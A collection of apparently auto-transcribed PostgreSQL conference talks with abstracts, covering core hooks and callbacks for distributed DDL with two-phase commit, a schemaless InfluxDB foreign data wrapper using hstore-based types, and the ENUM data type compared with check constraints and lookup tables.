So tomorrow we're starting at 10 am with great talk.
GitLab has an aggressive SLA, which made us research and develop solutions to improve performance in all directions on one of the most important components in our architecture: the PostgreSQL relational database. During this talk, we invite you to explore how we improve the performance of the main PostgreSQL database of GitLab.com in a highly demanding environment, with a load between 40k and 60k transactions per second. We share our projects, processes, and tools, including the tools developed by our partner Postgres.ai — the main one being Database Lab.
10.5446/53271 (DOI)
Hi, my name is Alexey and I am a software engineer at Postgres Professional. Today I want to talk about a specific aspect of PostgreSQL extensibility. PostgreSQL is well known for its extensibility: one can create their own types, operators, access methods, or use the powerful PL/pgSQL language to write extensions, functions, triggers, and so on. Everything is documented, supported, and ready to use. There is a lot of information in the official documentation, and if we refer to it, we can even find the roots of such remarkable extensibility. It says that PostgreSQL is extensible because its operation is catalog-driven. PostgreSQL keeps a lot of information in its catalogs, these catalogs are user-visible, and they describe not only databases, tables, and column names, but also operators, types, and many other things. So any user can extend PostgreSQL in many different ways. Yet there is also a very low-level extensibility layer, which allows external developers to peek right into the PostgreSQL core: hooks, and also callbacks, which are very similar — we will talk about them later. For some reason this topic is not covered enough by the official documentation. I think this is because it is a really low-level layer and you cannot use it properly without taking a look at the PostgreSQL code base. So what is a hook? A hook is a function — actually a global pointer to a function — and if it is defined, the core will execute it during standard query processing or during the backend lifetime, at some specific moment, with a predefined set of arguments. Such hooks are scattered all over the PostgreSQL core, and extensions or shared libraries can set them to get a view of PostgreSQL's internal state or to change its behavior. Let's have a look at how hooks are implemented in the code. The implementation is very simple and straightforward. As I said, it is just a pointer to a function; PostgreSQL checks whether it is defined, and if it is, the function is executed with a predefined set of arguments before or instead of some standard processing routine. Here is an example of a hook from PostgreSQL, ExecutorStart_hook. Since any hook is just a global pointer, it could already be defined and set by someone else. That is why, if an extension or any external shared library wants to install a hook, it first has to keep the previous value of this pointer. After that, we can put a pointer to our own function into this hook. This is how pg_stat_statements installs its hooks. This module provides the possibility to track planning and execution statistics of all SQL statements executed by the server, so it has to set as many hooks as possible along the whole path of query processing. By obeying the rule that every extension should remember the previous value of the hook, we build a chain — a linked list — of all hooks, and when a hook is executed, it also executes its predecessor, that one executes its own predecessor, and finally the last hook executes the standard processing routine. That's why every hook always has to call its predecessor. This may be a problem: if a malicious or careless extension forgets to call its predecessor and breaks this rule, it breaks standard query processing, because nobody will call the standard routine — so loading such an extension will break query processing on your server.
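As a small SQL-level illustration: hook-based extensions like pg_stat_statements only install their hooks when the library is loaded, which for this module has to happen at server start. The usual activation sequence looks something like this (the final query just shows the statistics the hooks collect):

```sql
-- Load the library at server start so its hooks get installed
-- (requires a restart; could equally be set in postgresql.conf).
ALTER SYSTEM SET shared_preload_libraries = 'pg_stat_statements';

-- After the restart, create the extension to expose the SQL-level view.
CREATE EXTENSION IF NOT EXISTS pg_stat_statements;

-- Statistics gathered by the planner/executor hooks
-- (total_exec_time in PostgreSQL 13+; total_time in older versions):
SELECT query, calls, total_exec_time
FROM pg_stat_statements
ORDER BY total_exec_time DESC
LIMIT 5;
```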
Every query passes through the different stages and postgres subsystems. For example, parser, analyzer, planner, and executer and finally results are returned back to the client. Hooks are placed all over the postgres query in many parts, but they are not distributed uniformly. I put some examples on the query processing flowchart and sometimes it is easy to point the hook location for executer because they are placed very straightforward in the start of the user and in many places between. All for planner where the main hook is planner hook and it's surrounded by a lot of additional hooks to add planner path and so on. But for some hooks, it is not easy to point the execution because this post-parse-analyzed hook is placed somewhere between parser and planner and we have already parsed 3 of the query but it is not planned yet. But I think it should be actually closer to the planner. As I said, hooks are not distributed uniformly and densest parts are executer, planner, and security hooks in the top of this flowchart where all the client authentication process happens. For example, this client authentication hook. All documentation prefers to keep silence about exposed hooks but there are some external sources that are well supported at least right now. First it is GitHub repository which lists all available hooks with their arguments and also every hook has a text description which says some basic information about where it is placed and how it could be used and maybe some extensions, lists all the extensions which use this hook. Next is this pgpedia website which is unofficial on documentation of the Postgres and also it has a list of hooks and the most interesting part there is that it says in which version which hook were added. And also it refers to a Git commit which introduced this hook. Also, postgresql.org website refers to these slides and talk from PgCon 2012. It is well detailed and there are a lot of information there but of course it is slightly outdated because some hooks were introduced after this talk. Let's move on to the next entity that is pretty similar to the hooks callbacks. Callbacks are mostly used for internal purposes but may be also useful for extensibility from the extensibility perspective. And some bundled with postgres extensions like postgresfdw get users there. The main difference in my understanding is that callbacks are initially designed to be set by multiple users. In other words, you don't have to care either the same callback has been already set by someone else or not like you have to keep a previous value of the hook. You just use the special set of functions to register your own function as a callback and that's all. This set of functions usually have very straightforward names like register something callback but sometimes they are not and called like before shared memory exit, on shared memory exit and a bunch of others. If the callback is defined it will be executed at some proper moment with proper arguments. Another important difference I think that callbacks provide less possibilities to modify postgres internal state and they are designed more to do a clean up for example clean error state or do something to catch invalidations and similar work. This is an example of how postgresfdw registers its callbacks to track cache invalidations and transaction state change. As I said you just have to call this set of function and it will be put into postgres grid core. 
Internally callback set of functions does a very similar work to what hook users do their self. It organizes a list of all registered callbacks and when it is time to go, postgres will run all of them one by one. Now we have a sense of how hooks and callbacks are implemented and work. Let's move on to an example of what an external developer can achieve with them. Nowadays everyone is talking about distributed postgres and we at postgres professional have two projects dedicated to distributing postgres over the multiple nodes. It's a multi master and shardman. This is a completely different story so let's talk about second sharded or partitioned postgres and in that case one wants to scale database horizontally. In other words we want to create partitioned tables but every node, physical node of postgres have to keep only a limited number of partitions. For example, if we're on this chart we have three nodes and table A and we split it into three partitions and first node keeps only partition one, second node keeps only partition two and third node keeps the last partition of this table. So we just distributed the data across or uniformly across this node. This is a very broad topic but let's focus on the essential part, scheme definition and creation of such partitioned tables. Of course we cannot use plain create table anymore because we have to scatter partitions across multiple nodes and also we have to link remote partitions to their physical representation because at least with postgres fw any data were accessible from any node. So client can connect to node three and also get data from partition two. So the basic way here is to just make partition two as a foreign table for partition two on the node two. So actually we need this distributed data definition language or DDL and so what requirements we can put on such distributed DDL. First we have to be able to broadcast specific or all DDL statements across a number of postgres skill nodes, second we want to create such distributed tables with familiar interface that's why we have to extend create table syntax and third is that this operation should be atomic and if you create do some DDL on multiple number of nodes this command should be either committed or aborted on all postgres skill instances at once. So we have to use so called two phase commit protocol and final requirement the most important for us is that we want to do everything from the extension and we do not want to do any core modifications here. But how does standard DDL processing work in postgres? There are a lot of steps as always but I put on this flowchart only three that matter for us. First we receive query from the client, we parse, plan, plan and do some preparation on it and finally we pass it to the processing routine which is specifically DDL. It is dedicated for processing DDL, it is called standard process utility and how we can intervene into this standard DDL processing and integrate our broadcasting routine. Actually there is a hook right in the place where we do need it, it is called process utility hook and it is executed instead of standard process utility responsible for DDL processing. And this hook receives the raw text of the statement and the plan statement. So we can decide for example if we receive create role and we decide that we want to have the same roles on every postgres instance then we can broadcast this original role statement to all postgres nodes. Code an example of this part can be found on github in our repository. 
Now as we have an option to broadcast an arbitrary DDL to all nodes we want to give users a convenient interface to create these distributed tables. Of course we can write some PLPJs query function, some wrapper which will do all the work and everyone can execute it on the existing table as for example CITS does and we can create a wrapper which will execute create table internally. There are some options but everyone gets used to create tables with create table statement. So we want to extend the syntax of create statements to be able to add additional parameters. In our case it would be distributed by the only one required parameter. It says that this table should be distributed across a number of nodes and it also specifies a column name which should be used for partitioning and it will be used as a partitioning key. Also we can specify a number of partitions, it may be optional if you have some default value or collocation information which means that if we have two tables with the same partitioning key and the same number of partitions we want that partitions with the same boundaries will be placed on the same physical node. So all joints executed on such partitions was local to some physical node. First let's check how posgrace reacts on unknown parameters in the create table statement. If we put this query in the psql we will see this unrecognized parameter distributed by a row and luckily it is not a syntax row which is usually thrown by the parser and it gives us a clue that parameters are not processed by the parser itself. It is not necessary because sometimes parser has some custom errors and process parameters. But still if we check the parser code we will find that it processes this unknown parameter successfully but this error arises somewhere later. So now we know that posgrace is able to parse arbitrary parameters in create table statement. However further routines do check them and do not path unrecognized parameters to the executor. And we need somehow read this additional parameters before parser verifies them and actually we are lucky enough again because we have post-parse analyzed hook which is placed after parser as I said before and we already have this parsed statement of the original query and we can check that it has this additional parameters and we can read them and keep in the local backend memory and after that remove them from this parsed statement and return control back to the core. And posgrace will not notice anything suspicious here and successfully proceed to the process utility hook where we can use our previously kept parameters to do some additional work. For example if we have distributed by we can add partitioning information there and so the further routines will create a partition table instead of a simple table. Or we will also can create partitions as well with the main partitioning table and we can decide to do broadcast or broadcast part of the work or anything else. So that's why we tricked posgrace extended syntax but posgrace thinks that we have not breaking anything. And final part of our extension to traditional DDL is atomicity. Without to PC transaction might end up committed on some nodes and aborted on others. It is not a consistent state and also it is not recoverable because you cannot abort already committed transaction. And we have to use so called to face commit protocol which introduces an intermediate state just called prepared and prepared transactions can be both committed later or aborted. 
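For reference, the SQL-level primitives Postgres already offers for that prepared state look like this (a minimal sketch; PREPARE TRANSACTION requires max_prepared_transactions > 0, and the GID and DDL are illustrative):

```sql
-- On each remote node, the broadcast DDL is first prepared, not committed:
BEGIN;
CREATE TABLE users_p1 (LIKE users INCLUDING ALL);   -- illustrative DDL
PREPARE TRANSACTION 'ddl_broadcast_42';

-- Later, once every node has prepared successfully, the coordinator decides:
COMMIT PREPARED 'ddl_broadcast_42';
-- ...or, if any node failed to prepare:
-- ROLLBACK PREPARED 'ddl_broadcast_42';
```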
And posgrace already has to PC infrastructure so we have to only use it when we are doing broadcast. I have really tried to make this flowchart readable but I'm not sure I have succeeded. Anyway, the main idea was that on the left part we have transaction flowchart. We begin it, we do some DDL there and since we have our standard process utility hook we can decide that we have to execute the same DDL on another node. This is placed on the right part of this flowchart. We begin this foreign transaction and execute this DDL there. So we have two transactions. Finally we decide that coordinator, this local transaction wants to commit and we proceed to commit. And we have transaction callback which is placed in the middle. And we have this pre-commit event and posgrace fdw for example uses this event to find a time so to decide that it is time to commit all foreign transaction which was open during this local transaction. And we first commit all foreign transaction and proceed to local commit. And everything is fine if we succeeded but if we fail at some point we may end in the state where foreign transaction was committed but local was supported and as I said it's not a recoverable state. So how we can integrate to face commit protocol here? If we consider only commit part of the previous flowchart then instead of doing commit of foreign transaction at pre-commit event in the transaction callback we can first prepare it and when we prepare successfully all foreign transactions we will proceed to the local commit and also in transaction callback we have a commit event. In this state when event commit event fired for transaction callback it is too late to abort local transaction so we will proceed to committing all prepared transaction on foreign service. And again if everything went fine then we just commit all foreign transactions and proceed it to committing all local transaction. But if we crashed at some point we may end or foreign server has crashed we may end in the state when some transactions were prepared but not committed yet. And in this case we have to introduce some additional process which may be called resolver and it could be a background walker or even external process written in any language which will crawl every server and if it finds this orphan prepared transaction it should find the state on the coordinator who initiated this transaction and decide whether to commit them or abort. Simple patch prototype which adds to face commit protocol into posgust fdw can be found in the fpgsql hacksmailing list. So finally we achieved all our points and we didn't touch posgust codebase and we can use our extension with the same packages, packets of posgusts and we do not need to recompile it and do anything else. If you have any questions, feedback or comments you can reach me directly and thank you for attending my talk. Thanks. So I think we are live now. So we have one question up for the year is about the Duke at parse level. What if we want to manage the statement at parse level? We are seeing the statement can be trapped after the parsing is done. So what we want to do before the parse is done? Do we have a look for that? No, unfortunately as far as I know we have only this post-parse analyzed hook which is only related to the parser and it receives already parsed tree where everything is already parsed so we can only modify this already parsed tree. 
So I think that actually we can do a lot of stuff there but still we are limited by the parser so if there are some invalid characteristics then the parser will throw this syntax error much earlier. And so I think that the process hooks only placed in some specific places due to historical reasons because some places were more interesting from the extensibility perspective like executor and planner. So far we have no option for that. There's another question. Any comments on cleanup of a new prepared transaction to avoid blocking vacuum? I was about to ask these things. How about the prepared transaction if they stay unused? Yeah, this is the right question. So if we do such implicit TPC then...
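As general background on that question — and this is a generic sketch, not part of the speaker's answer — prepared transactions that are never resolved hold back the xmin horizon and block vacuum, which is exactly why a resolver process is needed. They can be inspected and resolved manually along these lines:

```sql
-- List prepared transactions that have been sitting around for a while:
SELECT gid, prepared, owner, database
FROM pg_prepared_xacts
WHERE prepared < now() - interval '10 minutes'
ORDER BY prepared;

-- After checking the coordinator's state, resolve each one explicitly:
-- COMMIT PREPARED 'some_gid';
-- ROLLBACK PREPARED 'some_gid';
```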
PostgreSQL is well-known for its extensibility. One can create their own types, operators, access methods, etc. or use powerful PL/pgSQL language to write functions, extensions, and so on and so on. Everything is thoroughly documented, supported and ready to use. However, there is also a very intimate extensibility layer, which allows external developers to peek right into the PostgreSQL core — hooks. For some reason this topic is not covered enough by official documentation. First, this talk will focus on which core hooks do exist, which options they provide for potential developers, and which PostgreSQL extensions get use of them to achieve an additional out-of-core functionality.
10.5446/53272 (DOI)
Hi everyone, today I want to talk about a foreign data wrapper study for schemaless databases. First, let me introduce myself. My name is Hiroki Kumagai and I live in Yokohama, Japan. I am working at Toshiba Corporation as a software engineer. I have been developing software for embedded devices based on open source software for a while, such as digital TV and so on. Since 2019 I have joined my current team, and we are developing technologies required for accessing various data. In this session I'd like to explain my study of an FDW design and implementation that is applicable to schemaless databases, and as a motif for this study I use InfluxDB — I will explain InfluxDB later. In this talk, a schemaless database means a database that does not require column definitions before inserting data. As you might know, FDW means foreign data wrapper. It is a standardized way of handling access to data stored in an external data source from SQL databases, and PostgreSQL can implement FDWs as extension modules. As the agenda: at first I'd like to explain what "schema" means in this talk and the features of InfluxDB. Then I will explain the current problems of influxdb_fdw, especially the limitations related to schema changes. After that I will explain the schemaless design approach for the FDW, its implementation, a demonstration, considerations for improvement, and the conclusion. I looked up what a schema stands for. In database terms, a schema is the organization and structure of a database, and a schema contains schema objects, which could be tables, columns, data types, views, and so on. There are many meanings for the term schema, but in this talk I focus only on columns as schema objects. InfluxDB is a kind of time-series database, so it is easy to use for managing sensor data from IoT devices and for logging. As the elements of the data, we should know five keywords in the InfluxDB world. A measurement is something like a table in an RDBMS. A point corresponds to a record. The timestamp is the timestamp of the data point; it has the name "time", it always exists, and internally it is the primary index. A tag is metadata that is also used as an index, but it is optional, and its value must be in string format. A field set contains the actual data values of a data point; at least one field is required, and the value type can be integer, float, string, or boolean. As a convention, I will call these three kinds of data — time, tags, and fields — the "InfluxDB keys"; they correspond to columns in an RDBMS. Some other InfluxDB features: there are two major release versions, version 1 and version 2, but we are focusing on version 1 at this moment. The query language is not SQL: the first one is InfluxQL, an SQL-like query language for InfluxDB, and there is another language, Flux, but we use InfluxQL because we think it is the primary language in version 1. As for the schemaless feature, an application can write new tags and fields at any time, without a schema-changing operation like ALTER TABLE. Here I'd like to show an example of schemaless operation with an INSERT query in InfluxQL. In the first step, the insert writes the tag key device_id with the value device1, and the field key sigA with the value 1, into the measurement at time zero. In this state there are only two keys, device_id and sigA. In the next step, without changing the data definition explicitly, we can insert new data with a new tag sub_id and also a new field sigB. As this table shows, the schema is updated by the insert operation alone. Next is about the FDW for InfluxDB.
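For contrast, with the one-to-one column mapping that the existing FDW uses (described next), the same evolution on the Postgres side needs an explicit schema change — roughly along these lines (the table name is illustrative, and the server definition and per-table OPTIONS are omitted; consult the influxdb_fdw documentation for the exact option names):

```sql
-- Foreign table mirroring the initial InfluxDB keys, one column per key:
CREATE FOREIGN TABLE sensor_data (
    "time"      timestamp with time zone,
    device_id   text,
    "sigA"      bigint
) SERVER influxdb_server;

-- After InfluxDB silently gains the new field sigB, Postgres still needs
-- an explicit DDL step before it can see it:
ALTER FOREIGN TABLE sensor_data ADD COLUMN "sigB" bigint;
```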
We already have one FDW implementation. In our project we are developing it and providing the source code in this GitHub repository. About the spec of this FDW: it supports only scan operations, but it also supports pushdown of WHERE clauses and some aggregate functions. The important part for this talk: the current FDW maps InfluxDB tags and fields to columns of a foreign table one to one. As for current problems: version 2 is not supported, INSERT and DELETE support is lacking, and the usability around InfluxDB schema changes needs to improve. After this, I will explain this schema change problem. As step one, a data point is written like this in InfluxDB, and for this state of the measurement we have to create a foreign table with this query in Postgres. As columns, there are time, device_id, and sigA; they correspond to the InfluxDB data keys one to one. After this, if we try to insert a new data point with a new field key sigB, Postgres cannot access the column sigB. As you can see, InfluxDB does not require any special effort for adding new data elements, but the FDW needs the table definition to be changed accordingly. So next, I want to eliminate this effort. My goal has two points for the design and implementation of schemaless support in influxdb_fdw. First, the FDW should be able to access data from InfluxDB without knowing the actual schema in InfluxDB; with this rule, it is possible to avoid the effort of maintaining the foreign table. Second, the FDW should be able to execute pushdown as much as possible, to prevent performance degradation. These figures show the difference between pushdown and no pushdown. For example, the current FDW can push down an aggregate function like sum() and execute it on the remote side, and we want to keep this pushdown feature even with schemaless support. My design approach: I fix the definition of the foreign table regardless of the state of the InfluxDB measurement, and map the tag set and the field set each into an unstructured data type based on hstore. As the actual data types, I introduce two new types, influxdb_tags and influxdb_fields. These two new types are used to distinguish between tags and fields during deparsing. The foreign table definition looks like this, and this definition is not influenced by the state of the data in InfluxDB. I'd like to explain the definition of these two new types, but before going further, let me explain hstore. The hstore data type can be used to store sets of key/value pairs within a single Postgres value, as a string. For example, in the string 'col1=>1, col2=>A', col1 and col2 are keys, 1 is the value of the col1 key, and A is the value of the col2 key. There are many access functions and operators provided for the hstore data type. From here I will explain the definition of the new data type influxdb_tags; influxdb_fields has the same definition. The implementation is like this: first, the type's input and output access functions are defined using the hstore C function hstore_in, and using these access functions CREATE TYPE is executed (some members are omitted here). The arrow operator is also required for this type, so again an access function is defined using the hstore C function hstore_fetchval, and the arrow operator is defined like this. As you can see, the new data type is defined entirely from hstore C functions, and here I thought it might be better if there were a way to define alias types over existing types — something like declaring influxdb_tags as an alias of hstore.
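If hstore is new to you, this is the behaviour the new types borrow (plain hstore shown here; the influxdb_tags and influxdb_fields types described in the talk wrap these same C functions):

```sql
CREATE EXTENSION IF NOT EXISTS hstore;

-- A single value holding a set of key/value pairs:
SELECT 'device_id=>device1, sub_id=>s1'::hstore;

-- The arrow operator fetches one value by key; a missing key yields NULL,
-- which matches InfluxDB returning nothing for unknown keys:
SELECT ('device_id=>device1, sub_id=>s1'::hstore) -> 'device_id';  -- 'device1'
SELECT ('device_id=>device1'::hstore) -> 'no_such_key';            -- NULL
```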
I'd like to explain how to refer the inflexdb keys for time, tag and field. In existing design, if the falling table is defined like this, we can select each columns like this. In new schema less design, we are always the falling table like this. And we can select corresponding inflexdb keys like this. As you can see using allow operator key allow value expression can be used to refer the value of the specified key within inflexdb tags and inflexdb field variables. Unfortunately, the query expression is complicated by the unusual. Here we'd like to consider getting all data from the falling table. We often select all columns by select star statement. In this query, because we do not specify any tag and or field keys, so if the w is difficult to output values of keys in separate columns, this is not compatible behavior with existing inflexdb fdw. And this output form may be a little difficult to use than the current fdw. This explains the usage of aggregation. At first it is allowed to specify inflexdb keys by using tags and fields variable with allow operator. However, the values of these inflexdb keys are always produced as string text data. So if the aggregate function expect to other data type for its argument, we have to cast them especially by some other data type. This example, we have to cast into big int to meet the argument type of some function and actual inflexdb value type. I won't explain further, but we need this type of cast expression also in where clause is as well. And group i can be specified in the same way. In this slide, I'd like to explain some kind of design issues when using unstructured data type. If we try to differ non-existing inflexdb keys, inflexdb does not respond errors without data. So fdw also do the same behavior as inflexdb. Now we consider cases if we make a mistake in differencing inflexdb keys between inflexdb tags and inflexdb fields. Because inflexdb behaves differently depending on tag or field, fdw should also change its behavior depending on it. However, if the inflexdb keys are used incorrectly, fdw may not be able to get correct results like this example. Misuse will be an expected result. And we might be able to check this kind of measure, misuse such if we can know correct set of tag key names. But however, I choose not to check these misuse such. I'd like to consider how to distinguish tag and field keys. And there is a way of getting tag key names by using dedicated query show tag keys. And fdw will get these tag key names by using this query only when import foreign schema is executed. There is another way to determine the tag key names by table option tags manually. However, it is not easy to use. So in the future, we'd like to automate detecting tag key names. fdw determine which keys are tags in query result by using this tag key names. From this slide, I'd like to explain the implementation based on my design approach. fdw can be implemented set of callback rootings. And fdw supports only scanning operation. So these callback rootings are called. But we have already existing fdw implementation for inflexdb. We have to modify only these four points. After this slide, I'd like to explain them. First, fdw need to know the inflexdb key names from query expression. Because we do not define actual inflexdb keys as columns in foreign table. So if get to foreign size callback, we fdw try to extract the inflexdb key names from a process to tlist in planner info. In this example, device ID, CIGA and CIGB are extracted as inflexdb key names. 
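For reference, the kind of query whose target list those key names are extracted from — and the general query pattern of the schemaless interface — looks like this (the columns tags and fields and the key names follow the talk's examples; the table name is illustrative):

```sql
-- Schemaless foreign table shape: only time, tags and fields columns exist.
-- Specific InfluxDB keys are addressed with the arrow operator, and field
-- values are cast because they always arrive as text:
SELECT tags -> 'device_id'              AS device_id,
       sum((fields -> 'sigA')::bigint)  AS total_sig_a
FROM   sensor_data
WHERE  tags -> 'device_id' = 'device1'
GROUP  BY 1;
```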
And this data stored in private data to use in other callback later. In order to extract inflexdb key names, fdw need to find target entry of data with an opxpar of a row operator and with it having variable of inflexdb tags or inflexdb fields as left argument and constant value as right argument. Next is modification of pushdown decision. If fdw need to allow pushdown, if expression is appeared like this opxpar and burn constant for inflexdb tags and inflexdb fields variable. And also they will have explicit cast expression within aggregated functions or to compare with other values. In this case, we will have expression constructed from core lsvo opxpar and constant. fdw need to allow pushdown this kind of expression too. And next, fdw need to construct remote query request into inflexdb. If we are trying to scanning for simple base relation, remote query can be constructed from inflexdb key names obtained at the get4in del size callback. If aggregation can be executed in remote, we should make a simple aggregate function target list from expression like agref target entry core lsvo opxpar by constant. Last is fdw need to construct result data which is consisting of unstructured data type variable inflexdb tags and inflexdb fields. In iterate4in scan, fdw executes query to inflexdb and using obtained result, values of tags are stored into inflexdb tags variable. And values of fields are stored into inflexdb fields variable by using tag key name list. The actual stored value is like this. The relation between key name and value are connected to its equal arrow. And multiple of these values are combined with comma. I'd like to demonstrate what I want to do. At first, we are going to create to 4in table. Upper half is a pskl shell and lower half is inflexdb cli. Now we can select all data both interfaces. There is same data. At this point, if we insert new data with new field key like this, in postgres can also get new field key without changing table definition like this. And also we can select specific inflexdb key value like this. And we can use aggregate functions like this. As you can see, we can push down the aggregate function in inflexdb. One is executed remote database. Using postgres version 13 with modified version of inflexdb fdw, now I could execute simple query but I think I need to further verification with test it. The tag names list, fdw need to know tag names in order to distinguish tags and fields. But fdw currently does not update automatically. So there is a room for improvement at this point. And I introduce new unstructured data types of inflexdb tags and inflexdb fields. They are just a partial copy of hstore data type. But I want to avoid partial copy of definition if possible. So I think it is good to have a way to over defining areas type for existing data types. This makes it easier to define and maintain. As a conclusion, I could show inflexdb fdw can be designed for schemaless databases by using unstructured data type based on hstore. This means we do not need to change table definition depending on state of remote database. I think this design can be applicable to fdw for other schemaless databases. But there will be cases it is suitable JSON type rather than hstore type for nested data structure. And we could confirm this fdw still supports pushdown feature. This is important from performance point of view. In the end, I'd like to release schemaless support in inflexdb fdw at least in this year. That's all for my presentation. Thank you for listening.
In order to connect to external databases, PostgreSQL supports Foreign Data Wrappers (FDW), and there are already many FDWs. However, many FDWs have restrictions that prevent full use of external database features. One such restriction: FDWs for schemaless databases need the foreign table definition to be changed whenever columns are added in the remote database, so the schemaless feature cannot be used to full advantage. This time, we considered implementing an FDW that does not require changing the foreign table when columns are added on the external database. I would like to introduce this study, based on the time-series database InfluxDB as the schemaless database.
10.5446/53273 (DOI)
Okay, hello everybody, this is Boris Mejias. I'm a holistic system software engineer, more formally known as a solution architect, working for EDB. I'm also an air guitar player, I like a lot of music, and you can find me on Twitter, so we can exchange ideas about this presentation, about PostgreSQL, and about music in general. The reason I'm presenting this is because I use enum, the enumerated data type, which I think is the most underrated data type in PostgreSQL. I'm going to explain why I like it a lot, and maybe you'll get convinced and start using it in your applications too. This is basically a presentation meant for developers, for when they have to design their databases — I'm giving you more tools to build better data integrity at the level of your database. So I think it fits well here, because it's a presentation for developers. Let's say we have to implement an application that collects feedback from visitors — rating dev rooms, talks, speakers, and so on — and the feedback has to be one of: awful, bad, average, good, great, awesome. Those are all the possibilities they have. So you have to put this information in your database. I'm not going to talk about the front end, because I'm terrible at it, but about the database. Let's see how you register the feedback for the dev rooms. First, the direct approach: you create a table, devroom feedback. Each piece of feedback has its own ID, that's the devroom feedback ID. Then you have a devroom ID, which is a foreign key pointing to a list of dev rooms, because you don't want some ghost dev room getting feedback. You have the moment in time when the person clicked on the application to give the feedback, and the feedback itself, which you store as a text value, because as we just described them, they're all just text. So this fits very well. That's your feedback table. So you insert a value: person 1984 says that room 42, which is actually the PostgreSQL dev room, is awesome, right now. Quite a realistic test. That inserts just fine. And then the next entry also says it's awesome, but for some reason it's typed wrongly — a different application, because you have to open this database to many people — and it gets inserted as well, because it's just text, and any text is valid. So you get all this information in there, and we don't want that: we want to guarantee valid feedback information. So what we are going to do: exactly the same table, but we add a constraint. A good friend of mine says that "constraint" is a bad word — it's actually a guarantee. It guarantees that the feedback is going to be one of the values in this array. Those are the possible values, and you only want to have those. So what happens now: if you insert "awesome" misspelled — so, wrong — then you get an error. It tells you, sorry, your value violates this check constraint, which says it has to be one of the values in the array, so please try again. So this guarantees valid values. This is very good.
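A sketch of that check-constraint version (table and column names are my reconstruction of the slides):

```sql
CREATE TABLE devroom_feedback (
    devroom_feedback_id bigserial PRIMARY KEY,
    devroom_id          integer     NOT NULL REFERENCES devrooms (devroom_id),
    feedback_time       timestamptz NOT NULL DEFAULT now(),
    feedback            text        NOT NULL
        CHECK (feedback = ANY (ARRAY['awful','bad','average','good','great','awesome']))
);

INSERT INTO devroom_feedback (devroom_id, feedback) VALUES (42, 'awesome');  -- ok
INSERT INTO devroom_feedback (devroom_id, feedback) VALUES (42, 'awsome');
-- ERROR:  new row for relation "devroom_feedback" violates check constraint ...
```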
So we are going to apply this constraint, not only for that one feedback, but also for this other table that we have here, talk feedback, you see, it's just exactly the same. And we have to create again, exactly the same constraint. So as you can see, this is not going to scale. This is every time you have a four speakers and for all the other people that is all the other items that you want to get feedback is going to be terrible. You don't want to have this. So that's why you have normalization. This is the concept in database that is very important, very known. Sometimes there are some ways to denormalize and I agree. But in this case, you really want to have normalization. So what you do, you create a lookup table. So you have a table where you have all your feedbacks. This is not a language word, but it. The plural feedback and you have your ID and the name of the feedback. And you're going to insert all the possible values on this table. And then you can refer to this table from the feedback, the from feedback or talk feedback or speed speaker feedback. So this is the previous definition of the table. You see that you have their feedback as a text. Now you're going to have a feedback ID, which is going to be an integer referring to this lookup table. And now it's normalized. And it's impossible that you're going to introduce data that is not valid because it has to be first on the feedback table. Yeah. And you can reuse it. So now we have the talk table. So you see the previous one was the debt room. Sorry, the debt room feedback. And now you have the ID and I have the talk feedback and then you have the same ID and then you can reuse this table. So this is why normalization works. So now you insert the values. The only thing that I don't like about the solution is that now you have a number six here for saying that it's awesome if you don't remember which number it was. It is complicated. So you have to probably do and select and nested select there. So it is, it is okay. I mean, it's not that complicated, but you see how this starts making your queries a little bit more complicated. A little bit now that we have larger ones, it's going to be even more complicated. So now you got in the enumerated data type. And this is what I want to talk to you about. So let's see what in them can do for you. Inam is actually a type. Yeah, so we're going to define a type for feedback. So we're going to create a type. Does it create type? It's called feedback as an inam. And then we're going to give all the possible values for this type. Yeah, so we have six types there. And let's see what we can do with this inam. We create a table that from feedback. This is exactly the same one. I'm showing you the previous version with the ID as a foreign key. You can see there. Now, feedback ID. Now we're going to show you the one that has the text. When you start having the text, because this one has to have this constraint, it's too complicated. Now we just put feedback there. So it's our type. It says the same thing that your integer, timestamp, date, whatever. This is a feedback. It's a type. So you have created, you have extended your database with this type. So and you can reuse it then for all the tables. But let's see how it works. You just insert into different feedback exactly as you would do with text. So by the way, this is case sensitive. So it works exactly the same as the text. So it's more intuitive. And it is even better in the sense that you're not saying that this is text. 
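The enum version of the same schema, roughly as shown on the slides (names reconstructed; this replaces the text-based table above):

```sql
CREATE TYPE feedback AS ENUM ('awful', 'bad', 'average', 'good', 'great', 'awesome');

CREATE TABLE devroom_feedback (
    devroom_feedback_id bigserial PRIMARY KEY,
    devroom_id          integer     NOT NULL REFERENCES devrooms (devroom_id),
    feedback_time       timestamptz NOT NULL DEFAULT now(),
    feedback            feedback    NOT NULL   -- the column's type is the enum itself
);

INSERT INTO devroom_feedback (devroom_id, feedback) VALUES (42, 'awesome');  -- ok
```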
So it's more intuitive, and even better: you're not saying "this is text", you're saying this is a value of type feedback, and only certain values are accepted. If you try to put in a wrong value, like the misspelled "awesome", it gives you an error. Not the same error as with the check constraint, but an even better one: invalid input value for enum feedback. It even points at the offending value with an arrow and tells you it's on line two of the statement, so I know exactly where to fix it. Very good error reporting in Postgres. So again: you have your feedback type, your dev_room_feedback table with a column of type feedback, and you can simply reuse it for talk_feedback. It's reusable and it guarantees valid data. Now, what about performance? Normalization is supposed to matter for performance, so let's look at concrete cases: a table with only text, the cost of adding the check constraint, a feedback_id with a foreign key to a lookup table, and the ENUM data type. For this test I generated 2,267,709 random entries. It's a number as good as any other, so why not this one? Coincidentally, it was Douglas Adams's telephone number when he was writing The Hitchhiker's Guide to the Galaxy. On my laptop, not the best laptop, loading took about 36 seconds for plain text, and the check constraint didn't change that: also about 36 seconds, look at those first two numbers. With the foreign key there's another table involved and links to maintain between the two tables, so it takes more time; normalization is good, but you pay a bit of performance for it. And ENUM? I left it in white on the slide for suspense: is it really bad? Not actually. It's just as good as text, which I think is great news; we have a good type there. From here on I'll concentrate on the last three options, because the first one gives you no guarantee about the data and you should discard it. You want a database that gives you these guarantees and properties for your data; your data is important, so please store valid data. Throughout the presentation I'll do an approach comparison, not only a performance comparison: not just how fast it runs, but also how easy the code is to write, because from a developer's point of view it matters that your code is comprehensible, and that reduces the number of bugs. At least it does for me: the clearer the code, the fewer bugs. In this round I give slightly better points to text-with-check and to the ENUM, because they run faster and the insert code is shorter and clearer.
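A hedged sketch of the behaviour and of the data load behind the timing numbers; the talk does not show its exact generation query, so this is just one plausible way to produce the 2,267,709 random rows:

-- The ENUM column rejects the typo immediately:
INSERT INTO dev_room_feedback (visitor_id, dev_room_id, created_at, feedback)
    VALUES (1984, 42, now(), 'awsome');
-- ERROR:  invalid input value for enum feedback: "awsome"

-- One way to generate random test rows (illustrative, not the talk's script):
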